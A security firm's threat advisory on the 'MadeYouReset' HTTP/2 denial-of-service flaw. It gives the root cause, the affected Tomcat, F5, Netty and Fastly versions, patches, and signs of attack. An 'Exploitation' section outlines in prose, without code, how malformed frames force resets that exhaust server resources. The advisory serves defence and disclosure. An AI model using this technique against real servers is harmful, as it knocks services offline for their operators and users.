Denial-of-Service via HTTP/2: MadeYouReset Vulnerability Bypasses Rapid Reset Mitigations

Published Date: August 18, 2025
Category: ShadowOpsIntel
Share:

A new vulnerability dubbed “MadeYouReset” impacts multiple HTTP/2 server implementations, enabling large-scale Denial-of-Service (DoS) attacks. It bypasses traditional limits set on concurrent HTTP/2 requests per TCP connection, enabling attackers to overwhelm target servers and even trigger out-of-memory crashes. The flaw stems from a protocol misuse involving RST_STREAM frames — an evolution of previously known Rapid Reset attacks.

Severity Level: High

Vulnerability Details

  • ID: CVE-2025-8671 (with specific CVEs per vendor implementation)
  • Class: Denial-of-Service (DoS)
  • Affected Protocol: HTTP/2
  • Related Prior CVE: CVE-2023-44487 (Rapid Reset)
  • The root cause lies in the incorrect handling of RST_STREAM frames:
    • When a stream is reset, it’s counted as closed per HTTP/2 spec.
    • However, many server implementations continue processing the backend request.
    • The SETTINGS_MAX_CONCURRENT_STREAMS parameter in HTTP/2 is bypassed since reset streams are no longer counted.
    • Attackers exploit this by triggering resets via malformed frames or flow control violations, effectively creating resource leaks.
Affected ProductCVE IDAffected VersionsFixed Versions or Mitigations
Apache TomcatCVE-2025-4898911.0.0-M1 to 11.0.9; 10.1.0-M1 to 10.1.43; 9.0.0.M1 to 9.0.107; and Older, EOL versions may also be affected11.0.10 or later; 10.1.44 or later; 9.0.108 or later
F5 BIG-IPCVE-2025-54500BIG-IP Next (all modules): 20.3.0To mitigate this issue for systems and configurations that can use either HTTP or HTTP/2, F5 recommends using HTTP and disabling HTTP/2.
  BIG-IP Next SPK: 2.0.0 – 2.0.2, 1.7.0 – 1.9.2To mitigate this vulnerability, where possible, you can delete the F5SPKIngressHTTP2 Custom Resource.
  BIG-IP Next CNF: 2.0.0 – 2.0.2, 1.1.0 – 1.4.1
  BIG-IP Next for Kubernetes: 2.0.0
  BIG-IP (all modules): 17.5.0 – 17.5.1, 17.1.0 – 17.1.2, 16.1.0 – 16.1.6, 15.1.0 – 15.1.10Hotfix-BIGIP-17.5.1.0.80.7-ENG.iso, Hotfix-BIGIP-17.1.2.2.0.259.12-ENG.iso, Hotfix-BIGIP-16.1.6.0.27.3-ENG.iso
NettyCVE-2025-55163netty-codec-http2 (Maven): <=4.2.3.Final, <= 4.1.123.Final4.2.4.Final, 4.1.124.Final
FastlyCVE-2025-8671Releases before 25.17 of Fastly’s internal fork of H2Orelease 25.17

Exploitation

  • Open valid HTTP/2 streams from a client to the server.
  • Send crafted malformed control frames (e.g., invalid WINDOW_UPDATE, PRIORITY, DATA, HEADERS) to force server-initiated stream resets.
  • The server sends RST_STREAM but continues backend processing.
  • Since the protocol considers these streams closed, the attacker can repeat this process indefinitely.
  • The result is DoS via CPU overload or memory exhaustion.

Recommendations

  1. Apply security updates provided by vendors (Apache, F5, Netty, etc.) addressing CVE-2025-8671 and related CVEs.
  2. Indicators of attack for BIG-IP systems:
    For BIG-IP systems, you can inspect the HTTP/2 profile statistics. If the number of RST_STREAM frames Sent and WINDOW_UPDATE frames Received significantly exceeds the number of other frames received from clients, this may indicate that a malicious actor is conducting this type of attack.
    If there is no impact on the CPU load of the BIG-IP system, you may not need to take remedial action; however, if a significant or troublesome increase in CPU load is observed, download and install the engineering hotfix for this issue.
    For information about how to view the HTTP/2 profile statistics using the Configuration utility, tmsh, or SNMP, refer to K000137190: Overview of HTTP/2 Statistics.

Source:

  • https://thehackernews.com/2025/08/new-http2-madeyoureset-vulnerability.html
  • https://kb.cert.org/vuls/id/767506
  • https://lists.apache.org/thread/9ydfg0xr0tchmglcprhxgwhj0hfwxlyf
  • https://my.f5.com/manage/s/article/K000152001
  • https://github.com/netty/netty/security/advisories/GHSA-prj3-ccx8-p6x4
  • https://www.fastlystatus.com/incident/377810

Enjoyed reading this Threat Intelligence Advisory? Stay updated with our latest exclusive content by following us on Twitter and LinkedIn

No related posts found.

Ampcus Cyber
Privacy Overview

This website uses cookies so that we can provide you with the best user experience possible. Cookie information is stored in your browser and performs functions such as recognising you when you return to our website and helping our team to understand which sections of the website you find most interesting and useful.

 Contact Us